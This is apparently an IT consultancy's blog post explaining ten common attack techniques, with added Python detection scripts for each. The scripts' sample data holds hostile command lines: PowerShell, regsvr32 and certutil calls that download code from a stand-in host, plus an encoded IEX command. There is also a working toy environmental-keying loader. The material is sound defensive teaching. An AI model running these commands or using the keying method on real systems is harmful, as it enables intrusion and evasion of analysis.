10 Cyber Attack Techniques You Should Know (2023)
In our latest blog post, “10 Cyber Attack Techniques You Should Know,” we walk through the ten attack techniques that the latest ConnectWise threat report found most often in its sample of roughly 440,000 cyber attacks during 2022, and explain what each one means in practice. The pressure to innovate and keep pace with competitors often pushes cybersecurity down the priority list. To counter that, this guide gives decision-makers enough detail on each technique to make informed choices about their tools and processes.
Cyber Attack #1:
Exploitation for Client Execution
Exploitation for Client Execution means using a vulnerability in software that runs on the user’s own device, such as a web browser, an office suite or a document reader, to run the attacker’s code when the user opens a crafted file or page. The vulnerable program is usually reached through spear phishing (a malicious attachment or link sent to a specific person) or a drive-by download (a web page that fires the exploit on visit). Once the code runs, the attacker has a foothold on the machine as the logged-in user: from there they can read that user’s data, install further malware, take full control of the system, and use it as a launching pad against other computers on the network, with financial and reputational losses for the business.
For further information regarding the dangers of phishing, read our recent article – Cyber Security: Plenty of Phish in the Sea
Here are a few common targets:
Web Browsers:
Because drive-by compromise and spear phishing are so common, the web browser is the most exposed client application. An adversary can target a specific individual with a spear-phishing link, or catch victims through ordinary browsing. In the latter case the exploit targets a vulnerability in the browser itself or in a plugin the victim has installed: the attacker either sets up a site of their own that fires the exploit against every visitor, or injects malicious code into a legitimate site the victim already uses (a watering-hole attack), primed to run the next time the victim visits. Either way the outcome is code execution on the victim’s machine.
Office Applications:
Vulnerabilities in office suites are exploited by sending malicious documents, either as attachments or behind download links, in phishing emails. This only works if the user opens the attachment or follows the link and opens the file, so it relies on social engineering as much as on the vulnerability.
Common Third-Party Applications:
Widely deployed third-party applications such as Adobe Reader and, historically, Adobe Flash have been favourite vehicles for intrusion. Many of these exploits are delivered as objects inside a file the application is expected to open, for example a malicious PDF that runs code in the victim’s reader software when it is rendered.
How easily you can detect exploitation depends on the security tooling you have, but the signs are consistent:
- Abnormal behaviour of browsers or applications, in particular a browser, document reader or office program starting a command shell or script interpreter
- Suspicious files appearing on disk shortly after a document was opened or a page visited
- Evidence of attempts to hide execution, such as encoded or obfuscated command lines and code running from temporary or user-writable folders
- Unusual network traffic from the exploited application, for example a PDF reader downloading an executable
For further reading on cybersecurity best practices, see our article 10 ways to prevent cyber attacks.
Cyber Attack #2:
Boot or Logon Autostart Execution
Boot or Logon Autostart Execution runs the attacker’s code every time a device starts up or a user logs in. Just as you follow a morning routine before the day begins, an operating system runs a fixed set of programs at boot and at logon, and an attacker can add their own to that set. The goal is usually persistence: keeping access to a compromised system across reboots without having to exploit it again, and sometimes running with higher privileges than the original foothold, since some autostart locations execute as the system account or as whichever user logs in. Operating systems provide many such locations for legitimate software (on Windows, the Run and RunOnce registry keys and the Startup folders are the best known), and attackers simply abuse those rather than changing how the operating system works.
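As an added example (not from the original post), this Python audit parses a Windows registry export of the Run and RunOnce keys and flags entries that look attacker-planted: ones that launch a script host or proxy binary, point into a user-writable directory, or run a script file instead of an executable. The export text and the entry names are constructed. Legitimate software such as OneDrive does register itself under AppData\Local, which is why the rule only treats Roaming, Temp, Downloads, Users\Public and ProgramData as suspicious rather than all of AppData.

```python
"""Audit Run/RunOnce autostart entries from a Windows registry export (constructed sample)."""
import re

RUN_KEY_SUFFIXES = ("\\CurrentVersion\\Run", "\\CurrentVersion\\RunOnce")
# Interpreters and proxy binaries that legitimate installers rarely register as autostarts.
SCRIPT_HOSTS = re.compile(r"\b(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|cmd)(\.exe)?\b", re.I)
# Locations an ordinary user can write to; signed vendor software normally lives elsewhere.
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|Users\\Public|AppData\\Roaming|ProgramData)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|bat|cmd|hta|ps1|wsf)\b", re.I)

_VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s: str) -> str:
    # .reg files escape backslash and double quote with a backslash
    return re.sub(r'\\(["\\])', r'\1', s)


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: string_data}} for REG_SZ values in a .reg export.
    Binary and expand-string values (hex:, hex(2):) are skipped. 'reg export' writes
    UTF-16, so decode the file before calling this."""
    entries, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            entries.setdefault(key, {})
        elif key and line.startswith('"'):
            m = _VALUE_LINE.match(line)
            if m:
                entries[key][_unescape(m.group(1))] = _unescape(m.group(2))
    return entries


def suspicious_autostarts(entries: dict) -> list:
    """Return (key, value_name, command, reasons) for Run entries that look attacker-planted."""
    findings = []
    for key, values in entries.items():
        if not key.endswith(RUN_KEY_SUFFIXES):
            continue
        for name, cmd in values.items():
            reasons = []
            if SCRIPT_HOSTS.search(cmd):
                reasons.append("launches a script host or proxy binary")
            if USER_WRITABLE.search(cmd):
                reasons.append("points into a user-writable directory")
            if SCRIPT_EXT.search(cmd):
                reasons.append("runs a script file rather than an executable")
            if reasons:
                findings.append((key, name, cmd, reasons))
    return findings


# Constructed export: two legitimate entries and three that an attacker might plant.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="powershell.exe -w hidden -ep bypass -f C:\\Users\\alice\\AppData\\Roaming\\upd.ps1"
"Adobe Helper"="wscript.exe //B C:\\Users\\alice\\AppData\\Local\\Temp\\helper.vbs"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Cleanup"="C:\\Users\\Public\\clean.exe"
"""

if __name__ == "__main__":
    for key, name, cmd, reasons in suspicious_autostarts(parse_reg_export(SAMPLE_EXPORT)):
        print(f"{key.split(chr(92))[0]} ... {name}: {cmd}\n    {'; '.join(reasons)}")
```

On a real machine, produce the input with `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` (open the file with encoding="utf-16"), and check the HKLM keys, the Startup folders and scheduled tasks the same way; persistence rarely lives in just one place.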
Cyber Attack #3:
System Binary Proxy Execution
Attackers run their code through trusted, pre-installed and usually digitally signed operating system programs, known as system binaries (rundll32.exe, regsvr32.exe and mshta.exe on Windows are well-known examples), so that the malicious payload is launched by a program that security controls already trust. The binary is not cloned or modified: it is used exactly as designed, but pointed at the attacker’s content, which lets the payload slip past application allow-lists and signature checks that look at which executable is running rather than at what it was asked to do.
Cyber Attack #4:
Indirect Command Execution
Indirect command execution is a defence-evasion technique rather than a data-theft technique in itself. Instead of launching a command through the usual command shell, where detection rules tend to look, the attacker uses another built-in utility that will start a program on their behalf, such as the Windows forfiles or pcalua (Program Compatibility Assistant) tools, so that the malicious command never appears as a direct child of cmd.exe or PowerShell. Consider this scenario: an adversary compromises a computer through a phishing email and plants a script that collects financial data, arranged to run outside business hours. Because the script runs under the compromised employee’s own account and is started through one of these indirect routes, it does its work without tripping the command-line alerts a defender expects, and the attacker stays undetected.
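To make the detection signs concrete for Cyber Attacks #1, #3 and #4, here is an added example (not from the ConnectWise report or this post’s authors) of how those behaviours show up in process-creation telemetry. It runs a handful of rules over constructed Sysmon-style events: a content-parsing client application spawning a shell or script host (the tell-tale sign of client exploitation), signed Windows binaries such as rundll32, regsvr32 and mshta being pointed at remote or inline script (proxy execution), and launch-by-proxy utilities such as forfiles and pcalua (indirect command execution). The rule names, the sample command lines and the .invalid URLs are constructed for illustration; the technique IDs in the comments are MITRE ATT&CK’s.

```python
"""Process-creation rules for client exploitation, proxy execution and indirect execution."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record, in the shape of Sysmon Event ID 1 / Windows 4688."""
    parent: str   # parent image file name, e.g. "winword.exe"
    image: str    # child image file name
    cmdline: str  # child command line as logged


# Client applications that parse untrusted content. One of these starting a shell or
# script host is the classic sign of Exploitation for Client Execution (T1203).
CLIENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe",
               "acrobat.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

# System Binary Proxy Execution (T1218): a signed Windows binary launching attacker content.
PROXY_RULES = [
    ("rundll32 javascript: URL", re.compile(r"\brundll32(\.exe)?\s.*javascript:", re.I)),
    ("mshta remote or inline script", re.compile(r'\bmshta(\.exe)?\s+"?(https?:|vbscript:|javascript:)', re.I)),
    ("regsvr32 scriptlet from URL", re.compile(r"\bregsvr32(\.exe)?\s.*/i:https?:.*scrobj\.dll", re.I)),
    ("msiexec package from URL", re.compile(r"\bmsiexec(\.exe)?\s.*/i\s+https?:", re.I)),
]
# Indirect Command Execution (T1202): utilities that launch a command on the caller's behalf,
# so the payload is not a direct child of cmd.exe or powershell.exe.
INDIRECT_RULES = [
    ("forfiles /c", re.compile(r"\bforfiles(\.exe)?\s.*\s/c\s", re.I)),
    ("pcalua -a", re.compile(r"\bpcalua(\.exe)?\s+-a\s", re.I)),
    ("conhost --headless", re.compile(r"\bconhost(\.exe)?\s+--headless\s", re.I)),
]


def matching_rules(ev: ProcEvent) -> list:
    """Return the names of every rule the event trips (empty list if nothing matched)."""
    hits = []
    if ev.parent.lower() in CLIENT_APPS and ev.image.lower() in SCRIPT_HOSTS:
        hits.append(f"T1203 {ev.parent} spawned {ev.image}")
    for name, pat in PROXY_RULES:
        if pat.search(ev.cmdline):
            hits.append("T1218 " + name)
    for name, pat in INDIRECT_RULES:
        if pat.search(ev.cmdline):
            hits.append("T1202 " + name)
    return hits


def analyse(events) -> dict:
    """Map event index -> rule hits, for the events that tripped at least one rule."""
    results = {}
    for i, ev in enumerate(events):
        hits = matching_rules(ev)
        if hits:
            results[i] = hits
    return results


# Constructed sample events (not real telemetry); the base64 after -enc decodes to "IEX".
SAMPLE_EVENTS = [
    ProcEvent("winword.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ProcEvent("explorer.exe", "rundll32.exe",
              'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();'),
    ProcEvent("explorer.exe", "regsvr32.exe",
              "regsvr32 /s /n /u /i:http://payload.invalid/a.sct scrobj.dll"),
    ProcEvent("cmd.exe", "forfiles.exe",
              'forfiles /p c:\\windows\\system32 /m notepad.exe /c "cmd /c c:\\users\\public\\x.exe"'),
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs -p"),
    ProcEvent("acrord32.exe", "cmd.exe",
              'cmd.exe /c "certutil -urlcache -f http://payload.invalid/p.exe p.exe"'),
    ProcEvent("explorer.exe", "msedge.exe", "msedge.exe --profile-directory=Default"),
]

if __name__ == "__main__":
    for idx, hits in analyse(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].cmdline[:60], hits)
```

The parent-child rule is the highest-value one: an office application or PDF reader has no legitimate reason to start PowerShell, so it can be alerted on with very few false positives, whereas the command-line patterns need tuning against the software actually deployed in your environment.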
Cyber Attack #5:
Process Injection
Process injection runs malicious code inside the memory of a legitimate process that is already running on the target system. Because the code then executes under the name, and often the privileges, of a trusted program such as explorer.exe or svchost.exe, it evades security tools that judge activity by which executable is performing it, and it can read that process’s memory and ride on its network access. The common variants (writing code into another process and starting a remote thread in it, or hollowing out a freshly created process and replacing its contents) all require the attacker’s process to open the target with rights to write its memory and make it execute, which is what detection usually keys on. The effect is similar to a petty criminal escaping across a crowded train platform, using the crowd to blend in.
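Added example, not part of the original post: Sysmon Event ID 10 logs every time one process opens a handle to another, together with the access rights granted. Injection needs a handle that can both write into the target’s memory and make it execute, so decoding the GrantedAccess mask is the first filter. The access-right constants come from the Windows SDK; the events, the paths and the allow-list entry are constructed for the example.

```python
"""Decode Sysmon Event ID 10 (ProcessAccess) records and flag injection-capable handles."""
from dataclasses import dataclass

# Process access rights from the Windows SDK (winnt.h); only the bits that matter here.
ACCESS_BITS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
WRITE_MEMORY = 0x0020 | 0x0008   # VM_WRITE + VM_OPERATION: can plant code in the target
RUN_CODE = 0x0002 | 0x0800       # CREATE_THREAD or SUSPEND_RESUME: can make it run

# Tools that legitimately open other processes with full access. Constructed allow-list:
# in production match on signer and full path, never on the file name alone.
ALLOWED_SOURCES = {r"c:\program files\windows defender\msmpeng.exe"}


@dataclass
class AccessEvent:
    source_image: str
    target_image: str
    granted_access: int   # GrantedAccess field, e.g. 0x1FFFFF (PROCESS_ALL_ACCESS)
    call_trace: str       # CallTrace field; UNKNOWN(...) frames mean memory no module backs


def decode_access(mask: int) -> list:
    """Names of the rights set in a GrantedAccess mask, lowest bit first."""
    return [name for bit, name in sorted(ACCESS_BITS.items()) if mask & bit]


def injection_capable(mask: int) -> bool:
    """True when the handle allows both writing the target's memory and executing in it."""
    return (mask & WRITE_MEMORY) == WRITE_MEMORY and bool(mask & RUN_CODE)


def analyse(events) -> list:
    """Return (index, source, target, reasons) for events worth an analyst's attention."""
    findings = []
    for i, ev in enumerate(events):
        if not injection_capable(ev.granted_access):
            continue
        if ev.source_image.lower() in ALLOWED_SOURCES:
            continue
        rights = decode_access(ev.granted_access & (WRITE_MEMORY | RUN_CODE))
        reasons = ["injection-capable handle: " + ", ".join(rights)]
        if "UNKNOWN(" in ev.call_trace:
            reasons.append("caller is running from memory not backed by any module")
        findings.append((i, ev.source_image, ev.target_image, reasons))
    return findings


# Constructed events: a read-only LSASS handle, a full-access handle from a Temp binary,
# an allow-listed scanner, and Word opening svchost with the classic CreateRemoteThread set.
SAMPLE_EVENTS = [
    AccessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\lsass.exe", 0x1410,
                r"C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2e68e"),
    AccessEvent(r"C:\Users\bob\AppData\Local\Temp\update.exe", r"C:\Windows\explorer.exe", 0x1FFFFF,
                r"C:\Windows\SYSTEM32\ntdll.dll+9d4a4|UNKNOWN(000001E3B4A40F1C)"),
    AccessEvent(r"C:\Program Files\Windows Defender\MsMpEng.exe", r"C:\Windows\System32\notepad.exe",
                0x1FFFFF, r"C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Program Files\Windows Defender\mpengine.dll+1a2b3c"),
    AccessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                r"C:\Windows\System32\svchost.exe", 0x042A,
                r"C:\Windows\SYSTEM32\ntdll.dll+9d4a4|C:\Windows\System32\KERNELBASE.dll+2e68e|UNKNOWN(00000229D1F30100)"),
]

if __name__ == "__main__":
    for idx, src, dst, reasons in analyse(SAMPLE_EVENTS):
        print(idx, src, "->", dst, reasons)
```

A credential-dumping tool opening lsass.exe asks for read rights only (0x1410 in the first event), so it passes this particular filter and needs its own rule keyed on the target. The UNKNOWN frames in CallTrace are Sysmon’s marker for code running from memory that no loaded module backs, which is exactly what an already-injected process looks like when it injects onward.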
Cyber Attack #6:
Data Destruction
Data destruction is the deliberate erasure or corruption of files, disks or backups so that the victim cannot recover them. Its primary purpose is impact: operations stop when the data is gone. As a side effect it also destroys evidence, which makes it harder for forensic investigators to reconstruct the breach, although attackers who only want to cover their tracks more commonly delete specific logs and artefacts rather than wiping everything.
Cyber Attack #7:
Data Encryption (Ransomware)
Data encryption as an attack is the ransomware model: the attacker scrambles the victim’s files with a key only they hold and demands payment for it. Unlike the techniques above, it is not about concealment; the victim knows exactly what has happened. The irony is that encryption is the same tool we rely on to protect sensitive data, turned against its owner.
For example, a hacker who gains access to your systems encrypts the files and demands a ransom in exchange for the decryption key. Losing access to operational data can bring a business to a halt and cause significant financial and reputational damage, and paying does not guarantee that the key arrives or that copies of the stolen data are deleted.
A well-known real-world example is the 2017 WannaCry ransomware outbreak, which spread on its own between unpatched Windows machines. It disrupted NHS hospitals in the UK and the delivery company FedEx in the US, among many others, with damages estimated in the hundreds of millions of dollars. With systems encrypted, hospitals had to cancel appointments and turn patients away, putting lives at risk.
See our case study on the efforts of Microsoft Digital Crime Unit for more.
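Added example (not the post’s or Microsoft’s code): one way defenders catch ransomware in the act is that encrypted output is statistically unlike the documents it replaces. The snippet computes Shannon entropy per written file and alerts when one process writes many high-entropy files within a short window. The file-write events, process names and the .locked extension are constructed. Compressed archives and media files are also high-entropy, which is why a single write from the backup tool in the sample is not enough to alert on its own.

```python
"""Spot bulk encryption of files from file-write telemetry (constructed sample events)."""
import math
import random
from collections import defaultdict


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: roughly 4-5 for text, close to 8 for ciphertext or compressed data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


RANSOM_EXTS = (".locked", ".encrypted", ".crypt", ".enc")   # illustrative, not a complete list


def detect_bulk_encryption(events, min_files=5, window_s=10.0, entropy_threshold=7.5):
    """Return {process: {"files": [...], "renamed": n}} for processes that wrote at least
    min_files high-entropy files inside any window_s-second window.
    events are (timestamp_seconds, process_name, path, content_bytes) tuples."""
    high = defaultdict(list)
    for ts, proc, path, content in events:
        if shannon_entropy(content) >= entropy_threshold:
            high[proc].append((ts, path))
    alerts = {}
    for proc, writes in high.items():
        writes.sort()
        for i in range(len(writes)):
            j = i
            while j < len(writes) and writes[j][0] - writes[i][0] <= window_s:
                j += 1
            if j - i >= min_files:
                burst = writes[i:j]
                alerts[proc] = {
                    "files": [p for _, p in burst],
                    "renamed": sum(p.lower().endswith(RANSOM_EXTS) for _, p in burst),
                }
                break
    return alerts


# Constructed sample: deterministic pseudo-random bytes stand in for ciphertext.
_rng = random.Random(2023)


def _ciphertext() -> bytes:
    return _rng.randbytes(4096)


_text = b"Quarterly revenue summary: Q1 up 4 percent on the prior year. " * 64

SAMPLE_WRITES = [
    (0.0, "winword.exe", r"C:\Users\alice\Documents\report.docx", _text),
    (1.0, "backup.exe", r"D:\backups\2023-03-04.zip", _ciphertext()),   # archive: high entropy, one file
] + [
    (5.0 + 0.4 * k, "svchosts.exe", rf"C:\Users\alice\Documents\file{k}.xlsx.locked", _ciphertext())
    for k in range(6)
]

if __name__ == "__main__":
    for proc, info in detect_bulk_encryption(SAMPLE_WRITES).items():
        print(proc, "encrypted", len(info["files"]), "files,", info["renamed"], "with ransom extensions")
```

The thresholds are deliberately conservative; in production the same signal is usually combined with the process’s reputation, deletion of volume shadow copies, and ransom-note files appearing in every directory.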
Cyber Attack #8:
Valid Accounts
One of the simplest ways for a threat actor to get into a system and past its security controls is to use legitimate credentials: an employee’s username and password obtained through phishing, a leaked credential dump or password reuse. Activity performed with a real account looks like the employee’s own work and raises fewer alarms than an exploit would. Dormant accounts belonging to former staff, service accounts and test accounts are especially attractive because nobody is watching them, and if they still carry old privileges the attacker inherits those and can use them to escalate further.
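To show what targeting a dormant account looks like in authentication logs, here is an added example (not from the original post) that flags a successful logon to an account unused for more than 90 days, and a success that follows a burst of failures from one source. The log line format, the user names, the IP addresses (from documentation ranges) and the last-seen dates are all constructed.

```python
"""Flag logons to dormant accounts and successes after a failure burst (constructed logs)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

DORMANT_AFTER = timedelta(days=90)
FAIL_BURST = 5                         # this many failures from one source against one account
FAIL_WINDOW = timedelta(minutes=10)    # inside this window, followed by a success

_LINE = re.compile(r"^(\S+) user=(\S+) src=(\S+) result=(success|failure)$")


def parse_line(line: str):
    """Parse one constructed log line; returns (timestamp, user, source, succeeded) or None."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m.group(2), m.group(3), m.group(4) == "success"


def find_suspicious_logons(lines, last_seen: dict) -> list:
    """last_seen maps user -> datetime of their most recent successful logon before these
    lines (taken from the directory or identity provider). Lines must be in time order.
    Returns (timestamp, user, source, reason) tuples."""
    findings = []
    failures = defaultdict(deque)          # (user, source) -> recent failure timestamps
    last_seen = dict(last_seen)            # copy so the caller's baseline is untouched
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, user, src, ok = rec
        key = (user, src)
        if not ok:
            failures[key].append(ts)
            while failures[key] and ts - failures[key][0] > FAIL_WINDOW:
                failures[key].popleft()
            continue
        prev = last_seen.get(user)
        if prev is not None and ts - prev > DORMANT_AFTER:
            findings.append((ts, user, src, f"dormant account active again after {(ts - prev).days} days"))
        recent = [t for t in failures[key] if ts - t <= FAIL_WINDOW]
        if len(recent) >= FAIL_BURST:
            findings.append((ts, user, src, f"success after {len(recent)} failures from {src}"))
        failures[key].clear()
        last_seen[user] = ts
    return findings


# Constructed baseline: jsmith left the company months ago and was never disabled.
LAST_SEEN = {
    "alice": datetime(2023, 3, 3, 17, 2, tzinfo=timezone.utc),
    "bob": datetime(2023, 3, 3, 9, 15, tzinfo=timezone.utc),
    "jsmith": datetime(2022, 9, 30, 11, 40, tzinfo=timezone.utc),
}
SAMPLE_LOG = """
2023-03-04T02:17:09Z user=jsmith src=203.0.113.7 result=success
2023-03-04T03:40:01Z user=bob src=198.51.100.9 result=failure
2023-03-04T03:40:14Z user=bob src=198.51.100.9 result=failure
2023-03-04T03:40:27Z user=bob src=198.51.100.9 result=failure
2023-03-04T03:40:41Z user=bob src=198.51.100.9 result=failure
2023-03-04T03:40:55Z user=bob src=198.51.100.9 result=failure
2023-03-04T03:41:08Z user=bob src=198.51.100.9 result=success
2023-03-04T08:01:12Z user=alice src=10.0.4.21 result=success
2023-03-04T08:03:45Z user=alice src=10.0.4.21 result=failure
2023-03-04T08:03:58Z user=alice src=10.0.4.21 result=success
""".strip().splitlines()

if __name__ == "__main__":
    for ts, user, src, reason in find_suspicious_logons(SAMPLE_LOG, LAST_SEEN):
        print(ts.isoformat(), user, src, reason)
```

Alice’s single mistyped password is not flagged, which is the point of the threshold. The better fix for the jsmith case is not detection but hygiene: disable accounts on the leaver’s last day, and review service and test accounts on a schedule.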
Cyber Attack #9:
Execution Guardrails
Despite the name, execution guardrails are not a defensive control. The term describes checks that an attacker builds into their malware so that it only runs on the intended target: the code inspects its environment (for example the machine’s domain name, hostname, locale or the presence of a particular file) and refuses to run anywhere else. Often the payload is encrypted with a key derived from those environment values, a trick known as environmental keying, so an analyst who captures the sample cannot even see what it does. The point is to defeat sandboxes and analysis labs that detonate suspicious files in a generic environment, and to avoid tripping alarms on machines the attacker did not mean to hit. Related sandbox-evasion checks look for evidence of a real user, such as recent mouse or keyboard activity, before the payload runs, on the assumption that an automated analysis system has none.
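Added illustration, not from the original post: a toy implementation of environmental keying, the guardrail described above. The payload is encrypted with a key derived from the victim’s expected DNS domain; on any machine whose domain differs, the loader’s check fails and the payload never decrypts. The cipher is a standard-library HMAC keystream used only so the example runs anywhere, the “payload” is an inert string, and the domain names are assumptions.

```python
"""Environmental keying: a payload that only decrypts on the intended target (toy example)."""
import hashlib
import hmac


def derive_key(environment_value: str, salt: bytes) -> bytes:
    """Key derived from something only the target has, here its DNS domain name.
    A slow KDF makes guessing the domain offline expensive for an analyst."""
    return hashlib.pbkdf2_hmac("sha256", environment_value.lower().encode(), salt, 50_000)


def keystream_xor(data: bytes, key: bytes) -> bytes:
    """Toy stream cipher (HMAC in counter mode). Real tooling would use AES-GCM; this exists
    only so the example runs with the standard library. XOR twice with the same key = identity."""
    out = bytearray()
    counter = 0
    while len(out) < len(data):
        out += hmac.new(key, counter.to_bytes(4, "big"), "sha256").digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, out))


def build_guarded_payload(payload: bytes, target_domain: str, salt: bytes) -> dict:
    """Package the payload so that only a host in target_domain can recover it."""
    key = derive_key(target_domain, salt)
    return {
        "salt": salt,
        # lets the loader test a candidate key without the package revealing the domain
        "check": hashlib.sha256(b"check" + key).digest()[:16],
        "blob": keystream_xor(payload, key),
    }


def run_guarded(package: dict, observed_domain: str):
    """What the loader does wherever it lands: derive, check, then decrypt or stay dormant."""
    key = derive_key(observed_domain, package["salt"])
    if not hmac.compare_digest(hashlib.sha256(b"check" + key).digest()[:16], package["check"]):
        return None   # wrong environment (sandbox, analyst VM, wrong victim): nothing happens
    return keystream_xor(package["blob"], key)


if __name__ == "__main__":
    # assumed target domain and inert payload, both constructed for the example
    pkg = build_guarded_payload(b"inert demo payload", "corp.example", salt=bytes(range(8)))
    print("on the target:", run_guarded(pkg, "CORP.EXAMPLE"))
    print("in a sandbox: ", run_guarded(pkg, "sandbox.local"))
```

For defenders the lesson is practical: a sample that does nothing in the sandbox is not necessarily harmless. Detonate it in an environment that matches the victim (domain, hostname, locale), or recover the derived key from memory on an infected host, rather than treating a clean sandbox run as a verdict.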
Cyber Attack #10:
Command and Scripting Interpreter
Command and scripting interpreters (the Windows command prompt and PowerShell, Unix shells, and script hosts for VBScript, JavaScript and Python) are the programs administrators use to change settings and automate tasks on a computer. Attackers use the same interpreters, because they are already installed and trusted, to run their own scripts: downloading additional malware, collecting and exfiltrating data, and moving between systems, often with the command encoded or obfuscated so that its intent is not obvious in logs. To minimise the risk, restrict interpreter use to the employees who need it (application control policies can enforce this), turn on script logging so that what runs is recorded, explore detection tooling that inspects command lines, and keep software and operating systems up to date.
For more information on the importance of patch management, check out our article on the topic.
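Attackers most often hide what they pass to PowerShell behind the -EncodedCommand flag, which takes base64 over UTF-16LE text. As an added example (not the post’s own), this decoder finds the flag in any of its accepted abbreviations, decodes the argument and lists the indicators found in the clear-text command. The command line, the download cradle and the .invalid URL are constructed.

```python
"""Find and decode PowerShell -EncodedCommand arguments in process command lines."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ARG = re.compile(r"(?:^|\s)[-/](\w{1,14})\s+([A-Za-z0-9+/=]{8,})")
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile", "Net.WebClient",
              "Invoke-WebRequest", "FromBase64String", "Start-Process", "-nop", "bypass")


def extract_encoded(cmdline: str):
    """Return the base64 argument of an -EncodedCommand-style flag, or None."""
    for flag, value in _ARG.findall(cmdline):
        if "encodedcommand".startswith(flag.lower()):
            return value
    return None


def decode_encoded(b64: str):
    """EncodedCommand is base64 over UTF-16LE text; return None if the argument is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse_cmdline(cmdline: str):
    """Decode an encoded PowerShell command line and list the indicators found in it.
    Returns None when the command line carries no encoded command at all."""
    b64 = extract_encoded(cmdline)
    if b64 is None:
        return None
    decoded = decode_encoded(b64)
    if decoded is None:
        return {"decoded": None, "indicators": ["undecodable -EncodedCommand argument"]}
    return {"decoded": decoded,
            "indicators": [i for i in INDICATORS if i.lower() in decoded.lower()]}


def encode_command(script: str) -> str:
    """How the attacker produced the blob (the same encoding PowerShell itself expects)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a download cradle hidden behind -enc; the URL uses the reserved .invalid TLD.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://payload.invalid/stage2.ps1')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_command(_CRADLE)

if __name__ == "__main__":
    result = analyse_cmdline(SAMPLE_CMDLINE)
    print("decoded:   ", result["decoded"])
    print("indicators:", result["indicators"])
```

Decoding is only half of it: turn on PowerShell script block logging (Event ID 4104 in the PowerShell operational log) so that the script is recorded in clear text even when the command line is obfuscated several layers deep.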
In conclusion, these ten techniques show the range of methods attackers use to compromise systems, steal sensitive data and cause disruption: exploiting client software, planting autostart entries, abusing trusted system binaries and interpreters, injecting code into legitimate processes, logging in with stolen credentials, and destroying or encrypting data for impact. Protecting against them takes a combination of basic hygiene (keeping software up to date, strong unique passwords and multi-factor authentication), restricting what ordinary user accounts and built-in tools are allowed to do, and monitoring for the behaviours described above. Regular employee training and awareness programmes reduce the chance that the phishing email at the start of most of these attack chains succeeds.
If you require an experienced and knowledgeable IT consultation, our experts are waiting to hear from you. We have product and service offerings to neutralise potential threats, empower your workforce and protect your business. Fill out the form below to get in touch.